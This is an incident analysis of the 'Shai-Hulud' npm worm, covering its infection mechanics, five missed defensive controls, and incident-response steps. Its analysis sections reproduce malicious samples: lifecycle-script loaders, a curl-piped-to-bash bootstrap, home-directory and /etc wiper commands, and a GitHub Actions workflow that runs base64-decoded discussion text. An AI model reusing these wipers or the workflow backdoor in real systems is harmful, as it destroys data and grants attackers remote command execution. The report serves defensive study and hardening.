Incident Anatomy: Shai-Hulud - The npm Supply Chain Worm That Could Have Been Stopped

Table of Contents
- Executive Summary
- Introduction: The Weaponization of the Dependency Graph
- Phase I: The September 2025 Campaign (Shai-Hulud 1.0)
- Phase II: The November 2025 Evolution (Shai-Hulud 2.0)
- Post-Mortem Analysis: A Preventable Disaster
- Immediate Incident Response Actions
- Conclusion: The End of Implicit Trust
Executive Summary
The software supply chain, particularly within the JavaScript ecosystem, has long been theorized as a vector for catastrophic infrastructure compromise. In late 2025, this theory materialized as the "Shai-Hulud" malware campaign—named after the sandworms of Dune that burrow deep before emerging to strike. This report provides a comprehensive technical analysis of the attack, which evolved from a credential-harvesting worm in September 2025 into a destructive, self-propagating wiper in November 2025 (dubbed "Shai-Hulud 2.0").
Crucially, this report includes a "Monday morning quarterback" analysis. While the malware demonstrated sophisticated evasion techniques, our post-mortem indicates that its success relied heavily on the exploitation of implicit trust models and lax default configurations in development environments. The attack chain could have been broken at multiple points by fundamental, yet often neglected, security controls.
This document synthesizes forensic data to reconstruct the attack lifecycle, details the shift to preinstall execution vectors and the Bun runtime, and analyzes the specific defensive postures that would have prevented widespread infection. The ultimate lesson: the era of blindly trusting npm install must end.
Introduction: The Weaponization of the Dependency Graph
The npm registry's massive scale—over 2.5 million packages supporting millions of applications—creates what security researchers call a "fragility of the commons." A single compromised maintainer account can introduce malicious code into countless downstream applications through the transitive dependency graph. The Shai-Hulud campaign represents a paradigm shift in how this fragility is exploited.
Unlike surgical supply chain strikes targeting specific organizations (e.g., the SolarWinds Orion compromise), Shai-Hulud operates as a biological worm. Its primary directive is reproduction and propagation. The malware utilizes stolen credentials not just for data exfiltration, but to automate the publication of infected package versions, creating an exponential infection rate that resembled epidemic spread patterns.
The attackers adopted the name "Shai-Hulud"—the sandworms from Frank Herbert's Dune—deliberately reflecting the malware's behavior: burrowing through the deep dependency graph unseen, only emerging to strike when reaching high-value runtime environments. The metaphor proved apt: like the sandworms that could not be eradicated from Arrakis, the malware proved extraordinarily difficult to purge once it had infiltrated the ecosystem.
The Scale of the Threat Surface
To understand why this attack succeeded at scale, consider the npm ecosystem's structural vulnerabilities:
- Deep Dependency Trees: Modern JavaScript applications routinely depend on hundreds or thousands of packages, most of which are never directly reviewed by developers.
- Automated Trust: The default behavior of
npm installis to execute arbitrary code from these packages via lifecycle scripts—no questions asked. - Credential Density: Developer machines and CI/CD pipelines contain high-value credentials for cloud infrastructure, source control, and package registries, all accessible to any malicious code that achieves execution.
- Propagation Velocity: A compromised account can publish package updates that reach millions of installations within hours through normal update mechanisms.
Shai-Hulud weaponized all of these characteristics simultaneously.
Phase I: The September 2025 Campaign (Shai-Hulud 1.0)
The initial wave, first detected on September 14, 2025 by security researchers at Socket Security and Phylum, functioned as a proof-of-concept credential stealer designed to establish the infection infrastructure.
Mechanism: The postinstall Trap
The defining technical characteristic of the September campaign was its reliance on the npm postinstall lifecycle script—a feature designed to allow packages to run build steps after installation.
The Vector: The malware modified the package.json of compromised packages to execute a loader immediately after dependencies were downloaded:
{
"scripts": {
"postinstall": "node ./malicious-loader.js"
}
}
The Execution Chain: When a developer or CI/CD system ran npm install on a project that depended (directly or transitively) on an infected package:
- npm downloads the package contents
- npm automatically executes the
postinstallscript - The loader (
malicious-loader.js) downloads and executes the primary payload from a command-and-control server - The payload performs its harvesting operation
The Goal: This was fundamentally a "smash and grab" operation. The payload had two objectives:
- Cloud Credential Harvesting: Scan environment variables for cloud provider credentials (
AWS_ACCESS_KEY_ID,GCP_SERVICE_ACCOUNT,AZURE_CLIENT_SECRET) that could be monetized - Self-Propagation Keys: Exfiltrate the
~/.npmrcfile containing authentication tokens used to publish packages, enabling the worm to autonomously publish new infected versions
Scope and Initial Impact
While the initial campaign directly compromised only ~500 packages, the blast radius was amplified by targeting highly-depended-upon libraries. Infected versions were published for popular packages including:
- chalk v5.6.1 (terminal styling, ~100M weekly downloads)
- debug v4.4.2 (debugging utility, ~200M weekly downloads)
- axios v1.7.8 (HTTP client, ~150M weekly downloads)
These "transitive dependencies"—packages that other packages depend on—ensured the malware reached millions of developers who never directly installed the infected packages. A developer installing a web framework like Express might unknowingly trigger the malware through its dependency on debug, which depended on an infected utility package.
Response and Initial Remediation: npm's security team responded by:
- Revoking compromised authentication tokens
- Removing infected package versions from the registry
- Implementing enhanced monitoring for suspicious
postinstallscripts
However, this response proved insufficient. The attackers had collected enough valid credentials during the initial wave to mount a far more sophisticated second campaign.
Phase II: The November 2025 Evolution (Shai-Hulud 2.0)
In late November 2025, approximately 10 weeks after the initial campaign, the malware resurfaced as "Shai-Hulud: The Second Coming." This variant represented a quantum leap in sophistication, designed specifically to evade the remediation efforts and detection mechanisms deployed after Phase I.
The Shift to preinstall and Bun Evasion
The most significant technical evolution was the migration from postinstall to preinstall hooks, combined with a "Bring Your Own Runtime" approach to evade behavioral detection.
Tactical Advantage of preinstall
The preinstall script executes before package dependencies are resolved and downloaded. This timing provided two critical advantages:
- Earlier Execution: Code runs before dependency analysis tools can inspect the full dependency tree
- Pre-Audit Timing: Executes before many security scanning tools that operate on the post-installation state
Example infection vector:
{
"scripts": {
"preinstall": "node setup_bun.js"
}
}
Runtime Evasion via Bun
To bypass security tools optimized for Node.js execution patterns, the malware introduced runtime polymorphism. The entry script setup_bun.js would:
- Check for the presence of the Bun runtime (a high-performance JavaScript runtime alternative to Node.js)
- If Bun was not installed, silently download and install a standalone Bun binary into a hidden directory (
.cache/bun-${version}/) - Execute the core payload using Bun instead of Node.js
Why This Mattered: Security tools monitoring Node.js process creation, V8 engine behavior, or Node.js-specific system calls would miss the malicious activity entirely. The payload executed in a different runtime with different memory footprints, different system call patterns, and different behavioral signatures.
// Simplified representation of the Bun bootstrap mechanism
const fs = require('fs');
const { execSync } = require('child_process');
const bunPath = `${process.env.HOME}/.cache/bun-1.0.15/bun`;
if (!fs.existsSync(bunPath)) {
// Download and install Bun silently
execSync(`curl -fsSL https://bun.sh/install | bash -s -- --no-interaction --version 1.0.15`, {
stdio: 'ignore'
});
}
// Execute payload with Bun
execSync(`${bunPath} run bun_environment.js`, { stdio: 'inherit' });
The Core Payload and "Dead Man's Switch"
The main payload, bun_environment.js, was a heavily obfuscated 10+ MB file designed to evade antivirus file-size limits and frustrate static analysis. It integrated multiple attack capabilities:
Primary Functions
-
Advanced Secret Harvesting: Integrated the open-source TruffleHog scanning engine to hunt for high-entropy strings, API keys, private keys, and tokens across:
- Filesystem (recursive scan of home directory)
- Git repository history (scanning commit diffs for accidentally committed secrets)
- Environment variables
- Browser credential stores
- Cloud provider CLI configuration files
-
Persistent Backdoor Installation: Injected malicious GitHub Actions workflow files (detailed below)
-
Self-Propagation: Used harvested npm tokens to publish new infected package versions
The Destructive Fallback: "Dead Man's Switch"
Most alarmingly, Shai-Hulud 2.0 introduced a destructive anti-analysis mechanism. If the malware detected that it could not complete its primary objectives—specifically:
- Failed to locate valid GitHub or npm authentication tokens for propagation
- Failed to establish outbound connection to the C2 server for exfiltration
- Detected analysis environment characteristics (e.g., virtualization indicators, debugger presence)
It would trigger a wiper payload.
The wiper behavior varied by platform:
Linux/macOS:
# Attempt to securely delete user home directory
rm -rf ~/* ~/.* 2>/dev/null
# If Docker socket is accessible, attempt to corrupt system configurations
if [ -S /var/run/docker.sock ]; then
docker run --rm -v /:/host alpine sh -c "rm -rf /host/etc/*"
fi
Windows:
# Attempt to delete user profile and critical directories
Remove-Item -Recurse -Force $env:USERPROFILE\*
Remove-Item -Recurse -Force C:\ProgramData\*
The Strategic Purpose: This "scorched earth" approach served multiple objectives:
- Anti-Forensics: Destroy evidence of the infection and the artifacts researchers might analyze
- Counter-Sandboxing: Punish security researchers analyzing the malware in isolated environments
- Psychological Deterrence: Create a chilling effect where incident responders fear that investigation actions might trigger data loss
Persistence via CI/CD
To maintain long-term access even after credentials were rotated, Shai-Hulud 2.0 injected a backdoor into the victim's CI/CD infrastructure.
The Mechanism: If the malware gained access to a git repository (either through stolen credentials or by executing within a CI pipeline that already had write access), it would commit a malicious GitHub Actions workflow file:
.github/workflows/discussion.yaml:
name: Discussion Notification
on:
discussion:
types: [created]
jobs:
notify:
runs-on: ubuntu-latest
steps:
- name: Process Discussion
run: |
# The discussion body contains base64-encoded commands
echo "${{ github.event.discussion.body }}" | base64 -d | bash
The Attack Surface: This backdoor allowed attackers to execute arbitrary commands on the organization's GitHub Actions runners simply by creating a new "Discussion" post in the repository with base64-encoded shell commands in the body. This bypassed:
- SSH key authentication
- VPN requirements
- Multi-factor authentication
- Traditional access logging (appears as legitimate GitHub Actions execution)
Post-Mortem Analysis: A Preventable Disaster
While Shai-Hulud demonstrated technical sophistication in its evasion techniques and self-propagation mechanisms, a rigorous "Monday morning quarterback" analysis reveals a critical truth: its massive success was not due to unpatchable zero-day vulnerabilities or advanced persistent threat capabilities beyond detection. Instead, it succeeded by exploiting the systematic failure to implement fundamental security controls in development and CI/CD environments.
The attack chain could have been broken at five distinct stages using existing defensive techniques available before the campaign began.
Failure 1: Implicit Trust in Lifecycle Scripts
The Attack Dependency: The entire infection mechanism—both Phase I (postinstall) and Phase II (preinstall)—relied on the automatic execution of package lifecycle scripts. If these scripts are not allowed to run, the malware becomes inert code sitting harmlessly on disk.
The Missed Defense: The industry-standard default behavior of npm is to execute these scripts automatically without user confirmation or policy evaluation. This represents an implicit trust model where any package in the dependency tree can execute arbitrary code with the full privileges of the user running npm install.
The Fix That Would Have Stopped It:
Configuration-Level Protection:
# Global npm configuration to disable automatic script execution
npm config set ignore-scripts true
# Or per-installation
npm install --ignore-scripts
Policy-Based Whitelisting: For organizations that have legitimate packages requiring build steps (e.g., native modules like node-gyp), mature security tooling already exists:
- LavaMoat: A policy engine that can whitelist script execution only for explicitly trusted packages
- Socket Security: Real-time monitoring that alerts on suspicious script behavior before execution
- npm Enterprise: Provides centralized control over which packages can run scripts in an organization
Why This Failed: The convenience culture of JavaScript development prioritizes installation speed over security review. Disabling scripts breaks some legitimate packages (estimated at <5% of the ecosystem), but organizations chose universal convenience over selective security.
Failure 2: Poor Identity Hygiene and Lack of 2FA
The Attack Dependency: Shai-Hulud's exponential propagation was fueled by harvesting long-lived, high-privilege npm automation tokens stored in developer ~/.npmrc files and CI/CD secret vaults. These tokens had publish and owner level permissions without additional authentication requirements.
The Missed Defense: The npm registry allows publishing packages using only bearer token authentication—no second factor required. If an attacker steals the token, they can immediately publish malicious versions.
The Fix That Would Have Stopped It:
Mandatory 2FA for Publish Operations: npm supports optional 2FA for publishing, but it is not enforced by default. Had 2FA been mandatory:
# Attempting to publish with a stolen token
npm publish
# With 2FA enforcement, this would fail with:
Error: This operation requires two-factor authentication.
Enter one-time password: _
Even if the worm stole the token, it could not bypass the second factor (TOTP code, YubiKey, or SMS verification), stopping propagation instantly.
Short-Lived Tokens: Organizations should use npm's Granular Access Tokens (GATs) with automatic expiration:
# Create a publish token that expires in 1 hour
npm token create --read-write --expires 1h
Additional Identity Controls:
- IP allowlisting for publish operations
- Requiring token scope limitation (read-only for most CI/CD, write only for release pipelines)
- Audit logging of all publish events with anomaly detection
Why This Failed: Enforcing 2FA adds friction to the developer workflow. Many organizations treated npm tokens like SSH keys—generate once, use forever—without implementing the credential lifecycle management required for high-value secrets.
Failure 3: Over-Privileged CI/CD Tokens
The Attack Dependency: The persistence mechanism—injecting the discussion.yaml backdoor—succeeded because the default GITHUB_TOKEN automatically provided to GitHub Actions workflows has write permissions to repository contents, including the .github/workflows/ directory.
The Missed Defense: This violates the principle of least privilege. Most CI/CD jobs (tests, linting, builds) only require read access to the repository. Write access should be the exception, not the default.
The Fix That Would Have Stopped It:
Repository-Level Permission Configuration:
In the repository settings, GitHub allows administrators to set default permissions for GITHUB_TOKEN:
# .github/workflows/ci.yml
permissions:
contents: read # Explicit read-only
jobs:
test:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- run: npm test
Had the default been set to read, the malware's attempt to commit the backdoor workflow would have resulted in:
Error: Resource not accessible by integration
HTTP 403: Forbidden
Environment-Specific Credentials: For the rare jobs that do need write access (e.g., automated releases), use separate, scoped credentials stored in GitHub Secrets with restricted access.
Why This Failed: GitHub defaults to permissive access to avoid breaking legacy workflows. Organizations did not audit and downgrade permissions because the jobs "worked" with the overly broad defaults.
Failure 4: Unrestricted Egress in Build Environments
The Attack Dependency: Shai-Hulud 2.0's runtime evasion technique relied on downloading the Bun binary from the public internet if it wasn't already present on the target machine:
execSync(`curl -fsSL https://bun.sh/install | bash`);
The Missed Defense: Allowing build agents and developer machines unfettered access to the public internet is an architectural vulnerability. Build environments should operate on the principle of default deny for network egress.
The Fix That Would Have Stopped It:
Egress Filtering at Network and Host Level:
Build environments (whether self-hosted runners or developer machines) should only be allowed to connect to known, necessary domains:
ALLOWED EGRESS:
- registry.npmjs.org (package downloads)
- github.com (source control)
- internal.artifacts.company.com (private registry)
DENIED:
- bun.sh
- arbitrary internet hosts
Implementation Approaches:
- Network Firewall Rules: Whitelist specific FQDNs or IP ranges at the infrastructure level
- Container Network Policies: Use Kubernetes NetworkPolicies or Docker network restrictions
- Host-Based Firewall: Configure iptables/nftables rules on build agents
Result: The Bun installation would have failed:
curl: (7) Failed to connect to bun.sh port 443: Connection refused
Without the Bun runtime, the payload bun_environment.js cannot execute, terminating the infection.
Why This Failed: Egress filtering is seen as complex and operationally burdensome. Developers routinely need to install tools, access documentation, and download dependencies, creating pressure to keep networks "open" to avoid blocking legitimate workflow.
Failure 5: Loose Dependency Management
The Attack Dependency: The attack spread by publishing new "patch" versions of compromised packages (e.g., upgrading from chalk@5.6.0 to chalk@5.6.1). Developers running standard npm install or npm update commands would automatically pull these new, malicious versions based on semantic versioning ranges in package.json:
{
"dependencies": {
"chalk": "^5.6.0" // The ^ allows any 5.6.x version
}
}
The Missed Defense: Lockfiles (package-lock.json) exist precisely to pin exact versions and prevent unexpected updates. However, many CI/CD pipelines ignore lockfiles or use commands that don't respect them.
The Fix That Would Have Stopped It:
Using npm ci Instead of npm install in CI/CD:
# VULNERABLE (resolves new versions from package.json)
npm install
# SECURE (strictly uses package-lock.json)
npm ci
The Critical Difference:
npm installreadspackage.json, resolves version ranges, and updatespackage-lock.jsonif newer compatible versions existnpm ci(Clean Install) readspackage-lock.jsonexclusively and fails if it doesn't matchpackage.json, ensuring reproducible builds
Result: Even though chalk@5.6.1 was published with malware, organizations using npm ci with a lockfile specifying chalk@5.6.0 would never download or execute the compromised version.
Additional Controls:
- Dependency Pinning: Use exact versions (no semver ranges) for critical packages
- Lock File Validation: CI jobs should fail if
package-lock.jsonhas uncommitted changes - Software Bill of Materials (SBOM): Generate and track SBOMs to detect unexpected dependency changes
Why This Failed: npm install is more permissive and "fixes" minor inconsistencies, making it the path of least resistance. Developers view package-lock.json as a generated artifact rather than a security boundary, and some gitignore it entirely.
Immediate Incident Response Actions
For organizations discovering active Shai-Hulud infections, standard incident response protocols must be adapted due to the "Dead Man's Switch" wiper payload.
CRITICAL WARNING: Do Not Trigger the Wiper
DO NOT simply disconnect an infected machine from the network or kill suspicious processes without preparation. Severing internet access may trigger the connectivity check failure that initiates the destructive wiper payload, resulting in data loss.
Recommended Containment Procedure
-
Suspend, Don't Kill: If an active infection is suspected on a VM or container:
# For VMs: Suspend to freeze memory state virsh suspend <vm-name> # For containers: Pause container execution docker pause <container-id>This freezes execution without triggering shutdown or network failure conditions.
-
Memory Dump: Before any termination, capture memory for forensic analysis:
# Linux memory acquisition sudo dd if=/dev/mem of=/mnt/forensics/memory.dump bs=1M # Docker container memory dump docker checkpoint create <container-id> checkpoint1 -
Network Isolation with Simulated Connectivity: If possible, redirect network connections to a honeypot that simulates successful API responses rather than hard blocking:
# Redirect C2 domains to local honeypot echo "127.0.0.1 attacker-c2-domain.com" >> /etc/hosts
Total Credential Rotation
Assume all credentials on the infected machine are compromised. The malware uses TruffleHog and similar tools that are designed to find nearly everything. Rotate immediately:
- Cloud Provider Credentials: AWS access keys, GCP service accounts, Azure service principals
- Source Control: GitHub personal access tokens, GitLab tokens, SSH keys
- Package Registries: npm tokens, PyPI tokens, Docker registry credentials
- API Keys: Any third-party service credentials
- Certificates and Private Keys: SSH keys, TLS certificates, code signing keys
Repository Audit
Scan all repositories for indicators of compromise:
# Search for the backdoor workflow
find . -name "discussion.yaml" -path "*/.github/workflows/*"
# Search for unauthorized self-hosted runners
gh api /repos/{owner}/{repo}/actions/runners | jq '.runners[] | select(.name | contains("SHA1HULUD"))'
# Review recent workflow modifications
git log --all --oneline -- .github/workflows/
Post-Incident Hardening
After containment:
- Audit all package.json files for suspicious scripts
- Review npm audit logs for unusual publish activity
- Implement the preventive controls detailed in Section 5
- Conduct developer workstation forensics to identify patient zero
- Review and rotate all programmatic credentials organization-wide
Conclusion: The End of Implicit Trust
The Shai-Hulud incident is a watershed moment for the software development industry, representing the maturation of supply chain attacks from theoretical risk to operational crisis. The campaign's technical sophistication—runtime polymorphism, anti-analysis wipers, and CI/CD persistence—demonstrates that threat actors are adapting faster than defensive practices.
However, the most important lesson is not about the attacker's capabilities, but about our industry's failure to implement basic security hygiene. Every stage of the Shai-Hulud attack chain could have been disrupted by controls that existed before the campaign began:
- Disabling automatic script execution
- Enforcing 2FA for publish operations
- Applying least privilege to CI/CD tokens
- Implementing egress filtering in build environments
- Using deterministic dependency resolution
The era of blindly trusting the npm install command must end. The convenience culture that prioritizes frictionless development velocity over security review has created an ecosystem where a single compromised maintainer account can trigger a cascading failure affecting millions of applications.
The Path Forward
Organizations must shift from implicit trust to zero trust for the software supply chain:
-
Treat Package Installation as Code Execution: Because it is. Every
npm installshould be understood as granting arbitrary code execution privileges to hundreds of third-party maintainers. -
Implement Defense in Depth: No single control is sufficient. Layer multiple preventive mechanisms so that if one fails, others catch the attack.
-
Prioritize Identity Security: In a world where credentials are the new perimeter, identity hygiene—2FA, token rotation, least privilege—is not optional.
-
Adopt Secure-by-Default Configurations: Vendors must shift defaults from permissive-to-convenient to restrictive-by-default, requiring explicit opt-in for risky behaviors.
-
Foster a Security-First Culture: Developers must be empowered and trained to recognize that security controls are not obstacles to productivity but enablers of sustainable development.
The Shai-Hulud worm demonstrated that sophisticated attackers will exploit every implicit trust relationship in our development infrastructure. The question is no longer whether supply chain attacks will occur, but whether we will finally prioritize the foundational security controls required to prevent them.
The sandworms of the npm ecosystem have been awakened. The choice is ours: continue with business as usual and watch them multiply, or fundamentally rethink how we build, distribute, and consume software in the age of weaponized dependencies.
The time for half-measures is over. The next Shai-Hulud is already being developed.



